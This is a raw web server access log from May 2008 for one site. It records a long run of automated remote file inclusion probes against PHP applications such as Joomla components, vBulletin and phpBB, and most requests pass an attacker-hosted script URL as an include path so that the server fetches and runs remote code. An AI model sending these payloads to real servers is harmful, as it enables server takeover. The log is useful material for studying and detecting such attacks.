217.147.239.5 - - [29/May/2008:10:53:00 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:10:53:09 -0700] "GET /logs/access_080126.log//////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:53:25 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:53:25 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:53:25 -0700] "GET /logs/access_080217.log//vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:53:26 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:53:26 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:53:28 -0700] "GET /logs/access_071230.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:53:28 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:53:28 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:10:53:38 -0700] "GET /logs/access_080126.log//////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:53:48 -0700] "GET /logs/access_080219.log//vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:10:53:57 -0700] "GET //////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:54:06 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:10:54:17 -0700] "GET //////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:10:54:48 -0700] "GET /logs/include.php?path[docroot]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.171.70 - - [29/May/2008:10:54:49 -0700] "GET /include.php?path[docroot]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:10:55:14 -0700] "GET /logs/access_080130.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:10:55:15 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:10:55:21 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:10:55:22 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:55:24 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:55:25 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:55:45 -0700] "GET /logs/access_080217.log//vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:55:45 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:55:45 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:10:55:54 -0700] "GET /logs/access_080327.log/index.php?pagina=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:10:55:59 -0700] "GET /logs/access_080219.log//vbull/impex/ImpExData.php?systempath=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:10:56:17 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:10:56:19 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:56:30 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [29/May/2008:10:56:34 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:10:56:39 -0700] "GET /logs/access_080228.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:56:51 -0700] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [29/May/2008:10:57:05 -0700] "GET /logs/access_080327.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:10:57:24 -0700] "GET /logs/access_080118.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:10:57:53 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:10:57:53 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:10:57:54 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:10:57:54 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:58:05 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:58:05 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:58:05 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:58:06 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:58:06 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.197.154.101 - - [29/May/2008:10:58:10 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.197.154.101 - - [29/May/2008:10:58:10 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.197.154.101 - - [29/May/2008:10:58:11 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.197.154.101 - - [29/May/2008:10:58:13 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:10:58:17 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:10:58:24 -0700] "GET //common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.71.194.211 - - [29/May/2008:10:58:30 -0700] "GET /logs//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:58:45 -0700] "GET /logs/access_080327.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:59:57 -0700] "GET /logs/access_080205.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:10:59:59 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:11:00:00 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.25.195.72 - - [29/May/2008:11:00:23 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.25.195.72 - - [29/May/2008:11:00:23 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:11:00:28 -0700] "GET /logs/access.log/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:11:00:28 -0700] "GET /errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:11:00:29 -0700] "GET /logs/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.197.154.101 - - [29/May/2008:11:00:29 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:11:00:31 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:11:00:31 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:11:00:35 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:11:00:40 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:11:00:40 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:11:00:44 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:11:01:30 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:11:01:35 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:11:01:41 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:11:01:52 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:01:52 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:01:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:01:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.42.35 - - [29/May/2008:11:01:54 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.144.89 - - [29/May/2008:11:01:56 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:11:01:58 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:11:01:58 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:02:03 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:02:03 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:02:04 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:02:04 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:02:09 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:11:02:24 -0700] "GET /logs/access_080118.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:02:25 -0700] "GET /logs/access_080131.log/scanhttp://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:02:25 -0700] "GET /logs/access_071228.log/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:02:25 -0700] "GET /scanhttp://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:02:26 -0700] "GET /logs/scanhttp://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:02:30 -0700] "GET /index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [29/May/2008:11:02:31 -0700] "GET /logs/index.php?sub=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.197.154.101 - - [29/May/2008:11:02:35 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.197.154.101 - - [29/May/2008:11:02:35 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:02:52 -0700] "GET /logs/access_080127.log/scanhttp://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.62.215.228 - - [29/May/2008:11:02:55 -0700] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:11:03:03 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:11:03:03 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:03:11 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:03:14 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:03:14 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:11:03:46 -0700] "GET /logs/access_080201.log//index.php?pagina=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:11:03:48 -0700] "GET //index.php?pagina=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:11:03:49 -0700] "GET /logs//index.php?pagina=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:11:03:57 -0700] "GET /scanhttp://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:04:12 -0700] "GET /enc/content.php?Home_Path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:04:12 -0700] "GET /logs/enc/content.php?Home_Path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:11:04:47 -0700] "GET /logs/index.php?pagina=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:11:04:48 -0700] "GET /index.php?pagina=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:11:04:49 -0700] "GET /logs/access_080217.log//vbull/impex/ImpExData.php?systempath=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:11:04:50 -0700] "GET //vbull/impex/ImpExData.php?systempath=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:11:04:51 -0700] "GET /logs//vbull/impex/ImpExData.php?systempath=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:04:55 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:04:57 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:04:58 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:11:05:03 -0700] "GET /logs/access_080219.log//vbull/impex/ImpExData.php?systempath=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:11:05:05 -0700] "GET /logs/access_080327.log/joomla/index.php?option=com_restaurante&task=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.195.49.105 - - [29/May/2008:11:05:16 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.49.105 - - [29/May/2008:11:05:16 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:11:05:17 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
